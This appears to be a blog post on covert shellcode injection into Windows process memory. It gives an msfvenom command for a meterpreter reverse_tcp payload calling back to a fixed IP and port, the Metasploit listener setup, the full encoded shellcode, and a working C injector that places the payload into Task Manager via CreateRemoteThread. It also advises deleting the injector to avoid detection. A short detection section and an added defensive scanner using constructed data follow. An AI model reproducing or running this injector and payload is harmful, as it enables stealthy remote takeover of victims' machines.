The advantage of injecting shellcode into memory is that the probability of it being discovered is extremely low, almost negligible: when the shellcode is injected into process memory it has no corresponding file on disk, so it is hard to recover forensically from the disk. There is also a drawback: memory is volatile storage, so the machine must stay powered on and can never be shut down. This attack technique is therefore suited to servers, where the security risk is smallest; once the injection is done, simply delete the injector.
1. Generate the 64-bit shellcode with the following command:
[root@localhost ~]# msfvenom -a x64 --platform Windows \
    -p windows/x64/meterpreter/reverse_tcp \
    -b '\x00\x0b' LHOST=192.168.1.30 LPORT=9999 -f c
2. Start the listener.
[root@localhost ~]# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit
3. Compile and run the following code to inject the shellcode into the system's Task Manager. Finally, don't forget to delete the injector, or you'll get caught and have your legs broken.
#include <stdio.h>
#include <windows.h>

/* 64-bit meterpreter reverse_tcp stager produced by the msfvenom command above */
unsigned char ShellCode[] =
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xce\x25\x3d\xaf\x16\x16\x69\x6f\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x32\x6d\xbe\x4b\xe6\xfe"
"\xa5\x6f\xce\x25\x7c\xfe\x57\x46\x3b\x3e\x98\x6d\x0c\x7d\x73"
"\x5e\xe2\x3d\xae\x6d\xb6\xfd\x0e\x5e\xe2\x3d\xee\x6d\xb6\xdd"
"\x46\x5e\x66\xd8\x84\x6f\x70\x9e\xdf\x5e\x58\xaf\x62\x19\x5c"
"\xd3\x14\x3a\x49\x2e\x0f\xec\x30\xee\x17\xd7\x8b\x82\x9c\x64"
"\x6c\xe7\x9d\x44\x49\xe4\x8c\x19\x75\xae\xc6\x70\xe8\x17\xd6"
"\x2e\x3f\xa0\x93\x64\x69\x6f\xce\xae\xbd\x27\x16\x16\x69\x27"
"\x4b\xe5\x49\xc8\x5e\x17\xb9\x3f\x45\x6d\x25\xeb\x9d\x56\x49"
"\x26\xcf\xf5\xde\xf9\x5e\xe9\xa0\x2e\x45\x11\xb5\xe7\x17\xc0"
"\x24\x5e\x07\x6d\x0c\x6f\xba\x57\xa8\xa6\xc3\x64\x3c\x6e\x2e"
"\xf6\x1c\x9e\x82\x26\x71\x8b\x1e\x53\x50\xbe\xbb\xfd\x65\xeb"
"\x9d\x56\x4d\x26\xcf\xf5\x5b\xee\x9d\x1a\x21\x2b\x45\x65\x21"
"\xe6\x17\xc6\x28\xe4\xca\xad\x75\xae\xc6\x57\x31\x2e\x96\x7b"
"\x64\xf5\x57\x4e\x28\x36\x8f\x7f\x75\x2c\xfa\x36\x28\x3d\x31"
"\xc5\x65\xee\x4f\x4c\x21\xe4\xdc\xcc\x76\x50\xe9\xe9\x34\x26"
"\x70\x52\x4e\x9d\x49\x25\x5b\x6f\xce\x64\x6b\xe6\x9f\xf0\x21"
"\xee\x22\x85\x3c\xaf\x16\x5f\xe0\x8a\x87\x99\x3f\xaf\x31\x19"
"\xa9\xc7\xcf\x3b\x7c\xfb\x5f\x9f\x8d\x23\x47\xd4\x7c\x15\x5a"
"\x61\x4f\x68\x31\xf0\x71\x26\xfc\x7e\x68\x6e\xce\x25\x64\xee"
"\xac\x3f\xe9\x04\xce\xda\xe8\xc5\x1c\x57\x37\x3f\x9e\x68\x0c"
"\x66\x5b\x27\xa9\x27\x31\xe5\x75\x26\xd4\x5e\x96\xaf\x86\xac"
"\xfc\xee\xac\xfc\x66\xb0\x2e\xda\xe8\xe7\x9f\xd1\x03\x7f\x8f"
"\x7d\x71\x26\xf4\x5e\xe0\x96\x8f\x9f\xa4\x0a\x62\x77\x96\xba"
"\x4b\xe5\x49\xa5\x5f\xe9\xa7\x1a\x2b\xcd\xae\xaf\x16\x16\x21"
"\xec\x22\x35\x75\x26\xf4\x5b\x58\xa6\xa4\x21\x7c\xf7\x5e\x9f"
"\x90\x2e\x74\x27\xe4\x67\x49\xe9\xbc\xec\x36\x25\x43\xfa\x5e"
"\x95\xad\x4f\x90\xac\xcb\xc5\x56\x57\x30\x07\xce\x35\x3d\xaf"
"\x57\x4e\x21\xe6\x3c\x6d\x0c\x66\x57\xac\x31\xcb\x9d\xc0\xc2"
"\x7a\x5e\x9f\xaa\x26\x47\xe2\x70\x9e\xdf\x5f\xe0\x9f\x86\xac"
"\xe7\xe7\x9f\xef\x28\xd5\xcc\xfc\xf5\xf0\xe9\xc3\xea\x97\xce"
"\x58\x15\xf7\x57\x41\x30\x07\xce\x65\x3d\xaf\x57\x4e\x03\x6f"
"\x94\x64\x87\xa4\x39\x19\x59\x90\x1b\x72\x64\xee\xac\x63\x07"
"\x22\xaf\xda\xe8\xe6\xe9\xd8\x80\x53\x31\xda\xc2\xe7\x17\xd5"
"\x21\x46\x08\x6d\xb8\x59\x63\xa2\x28\x90\x29\x7d\x57\xaf\x4f"
"\x5f\xae\xad\x3e\x90\x9f\xf9\xe9\xc3\x69\x6f";

int main()
{
    HANDLE Handle;
    HANDLE remoteThread;
    PVOID remoteBuffer;
    DWORD Pid;

    printf("输入待注入进程PID号:");   /* prompt for the PID of the target process */
    if (scanf("%lu", &Pid) != 1)
        return 1;

    /* open the target process with full access */
    Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
    if (Handle == NULL) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }

    /* reserve and commit an RWX buffer in the target, then copy the shellcode into it
       (sizeof includes the terminating NUL of the string literal, which is harmless) */
    remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode),
                                  MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);

    /* start a thread inside the target whose entry point is the injected buffer */
    remoteThread = CreateRemoteThread(Handle, NULL, 0,
                                      (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    if (remoteThread != NULL)
        CloseHandle(remoteThread);
    CloseHandle(Handle);
    return 0;
}
If you have been compromised, you can use Process Explorer to monitor the system's behaviour and look for abnormal software. As the screenshot showed, Task Manager obviously should not have any network communication, yet here a connection is coming in, which clearly means a shell has been injected.
Then attach x64dbg to Task Manager and check whether remote threads exist; go through them one by one, and once you find one, extract its shellcode and decode it to see whether it yields any clues.
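The check that the x64dbg walk-through above performs by hand, written out as an added example that is not part of the original post: the injector leaves two indicators in the target, a private read-write-execute region with no backing module and a thread whose start address lies inside that region rather than inside a loaded image. The program below applies both rules to a snapshot of a process. The snapshot (module addresses, region sizes, thread IDs), the struct names and the function names are all constructed for illustration; on a live Windows system the same data comes from VirtualQueryEx and a ToolHelp32 thread snapshot, which the example deliberately does not call so that it compiles and runs on any platform.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* A committed memory region as a debugger or memory scanner reports it.
   Hand-built model (constructed data), not the output of a real tool. */
typedef enum { REGION_IMAGE = 0, REGION_MAPPED = 1, REGION_PRIVATE = 2 } region_type;

typedef struct {
    uint64_t    base;
    uint64_t    size;
    region_type type;
    int         executable;  /* PAGE_EXECUTE_* protection */
    int         writable;    /* PAGE_READWRITE or PAGE_EXECUTE_READWRITE */
    const char *image;       /* backing module for REGION_IMAGE, otherwise NULL */
} region;

typedef struct {
    uint32_t tid;
    uint64_t start_address;  /* thread entry point as the debugger shows it */
} thread_info;

/* Locate the committed region containing addr, or NULL if there is none. */
static const region *find_region(const region *regions, size_t n, uint64_t addr)
{
    for (size_t i = 0; i < n; i++) {
        if (addr >= regions[i].base && addr < regions[i].base + regions[i].size)
            return &regions[i];
    }
    return NULL;
}

/* Private memory that is both writable and executable matches the
   VirtualAllocEx(..., PAGE_EXECUTE_READWRITE) allocation of the injector above.
   Legitimate JIT engines can produce the same pattern, so treat it as an indicator. */
int region_is_suspicious(const region *r)
{
    return r->type == REGION_PRIVATE && r->executable && r->writable;
}

/* A thread whose start address is not inside an image-backed region was not started
   on code loaded from a module on disk; a thread created by CreateRemoteThread on an
   injected buffer looks exactly like this. */
int thread_is_suspicious(const region *regions, size_t n, const thread_info *t)
{
    const region *r = find_region(regions, n, t->start_address);
    return r == NULL || r->type != REGION_IMAGE;
}

/* Scan a snapshot, print every finding, and return how many there were. */
size_t scan_snapshot(const region *regions, size_t nr,
                     const thread_info *threads, size_t nt)
{
    size_t findings = 0;
    for (size_t i = 0; i < nr; i++) {
        if (region_is_suspicious(&regions[i])) {
            printf("[!] private RWX region at 0x%llx (%llu bytes)\n",
                   (unsigned long long)regions[i].base,
                   (unsigned long long)regions[i].size);
            findings++;
        }
    }
    for (size_t i = 0; i < nt; i++) {
        if (thread_is_suspicious(regions, nr, &threads[i])) {
            const region *r = find_region(regions, nr, threads[i].start_address);
            printf("[!] thread %u starts at 0x%llx in %s memory\n",
                   (unsigned)threads[i].tid,
                   (unsigned long long)threads[i].start_address,
                   r == NULL ? "uncommitted" : "non-image");
            findings++;
        }
    }
    return findings;
}

/* Constructed snapshot of a Task Manager process with one injected buffer. */
const region sample_regions[] = {
    { 0x7ff6a0000000ULL, 0x100000, REGION_IMAGE,   1, 0, "C:\\Windows\\System32\\Taskmgr.exe" },
    { 0x7ffc10000000ULL, 0x200000, REGION_IMAGE,   1, 0, "C:\\Windows\\System32\\ntdll.dll" },
    { 0x0001c0000000ULL, 0x40000,  REGION_PRIVATE, 0, 1, NULL },  /* heap: RW, no execute */
    { 0x0001c1000000ULL, 0x1000,   REGION_PRIVATE, 1, 1, NULL },  /* injected buffer: RWX */
};
const size_t sample_region_count = sizeof sample_regions / sizeof sample_regions[0];

const thread_info sample_threads[] = {
    { 1234, 0x7ff6a0012340ULL },  /* main thread, entry inside Taskmgr.exe */
    { 5678, 0x7ffc10020000ULL },  /* worker thread, entry inside ntdll.dll */
    { 9999, 0x0001c1000000ULL },  /* remote thread, entry at the RWX buffer */
};
const size_t sample_thread_count = sizeof sample_threads / sizeof sample_threads[0];

int main(void)
{
    size_t n = scan_snapshot(sample_regions, sample_region_count,
                             sample_threads, sample_thread_count);
    printf("%zu finding(s)\n", n);
    return n ? 1 : 0;
}
```

On the constructed snapshot the scan reports two findings, the RWX private region and the thread whose entry point is inside it; the main thread and the ntdll-started worker pass because their start addresses fall inside image-backed regions. The same two rules are what a memory-forensics tool applies to a process dump, which matters here because the post's whole premise is that the injected code never touches the disk.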
This article was published on 2024-02-01 17:03:26. Thank you for your support of this site!
Article link: https://www.4u4v.net/it/170677820638136.html